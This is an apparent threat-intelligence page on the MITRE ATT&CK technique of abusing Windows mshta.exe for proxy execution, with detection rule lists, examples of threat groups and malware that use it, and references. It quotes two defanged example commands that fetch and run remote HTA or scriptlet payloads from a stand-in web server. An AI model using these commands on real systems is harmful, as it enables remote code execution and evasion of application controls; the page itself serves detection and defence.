Mshta

T1218.005

Sub-technique of T1218 System Binary Proxy Execution.View on attack.mitre.org

About this technique

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.

Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.

Detection rules19

Rules on DetectionCode tagged with T1218.005.

Sigma7

RuleLevelLog source
Csc.EXE Execution Form Potentially Suspicious Parenthighwindows / process_creation
HackTool - CACTUSTORCH Remote Thread Creationhighwindows / create_remote_thread
MSHTA Execution with Suspicious File Extensionshighwindows / process_creation
Potential LethalHTA Technique Executionhighwindows / process_creation
Remotely Hosted HTA File Executed Via Mshta.EXEhighwindows / process_creation
Suspicious JavaScript Execution Via Mshta.EXEhighwindows / process_creation
Suspicious MSHTA Child Processhighwindows / process_creation

Splunk12

RuleTypeRiskData source
Cisco NVM - MSHTML or MSHTA Network Execution Without URL in CLIAnomalyNULLCisco Network Visibility Module Flow Data
Cisco NVM - Rundll32 Abuse of MSHTML.DLL for Payload DownloadAnomalyNULLCisco Network Visibility Module Flow Data
Detect mshta inline hta executionTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Detect mshta renamedHuntingNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Detect MSHTA Url in Command LineTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2, Cisco Network Visibility Module Flow Data
Detect Rundll32 Inline HTA ExecutionTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Mshta spawning Rundll32 OR Regsvr32 ProcessTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Suspicious mshta child processTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Suspicious mshta spawnTTPNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Windows Mshta Execution In RegistryTTPNULLSysmon EventID 13
Windows MSHTA Writing to World Writable PathTTPNULLSysmon EventID 11
Windows Process Writing File to World Writable PathHuntingNULLSysmon EventID 11

Groups17

Software11

Campaigns2

Procedure examples30

Groups17

Used byProcedure example
GroupAPT29

APT29 has use `mshta` to execute malicious scripts on a compromised host.

GroupAPT32

APT32 has used mshta.exe for code execution.

GroupAPT38

APT38 has used a renamed version of `mshta.exe` to execute malicious HTML files.

GroupConfucius

Confucius has used mshta.exe to execute malicious VBScript.

GroupEarth Lusca

Earth Lusca has used `mshta.exe` to load an HTA script within a malicious .LNK file.

GroupFIN7

FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.

GroupGamaredon Group

Gamaredon Group has used `mshta.exe` to execute malicious files.

GroupInception

Inception has used malicious HTA files to drop and execute malware.

View all 17 groups examples

Software11

Used byProcedure example
MalwareBabyShark

BabyShark has used mshta.exe to download and execute applications from a remote server.

ToolCovenant

Covenant can create HTA files to install Grunt listeners.

ToolKoadic

Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.

MalwareLumma Stealer

Lumma Stealer has used mshta.exe to execute additional content.

MalwareMetamorfo

Metamorfo has used mshta.exe to execute a HTA payload.

MalwareNanHaiShu

NanHaiShu uses mshta.exe to load its program and files.

MalwarePOWERSTATS

POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.

MalwarePteranodon

Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.

View all 11 software examples

Campaigns2

Used byProcedure example
CampaignC0015

During C0015, the threat actors used `mshta` to execute DLLs.

CampaignOperation Dust Storm

During Operation Dust Storm, the threat actors executed JavaScript code via `mshta.exe`.

References8

  1. Airbus Security Kovter Analysis Open source
    Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.
  2. Cylance Dust Storm Open source
    Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
  3. FireEye Attacks Leveraging HTA Open source
    Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.
  4. FireEye FIN7 April 2017 Open source
    Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
  5. LOLBAS Mshta Open source
    LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
  6. MSDN HTML Applications Open source
    Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.
  7. Red Canary HTA Abuse Part Deux Open source
    McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.
  8. Wikipedia HTML Application Open source
    Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.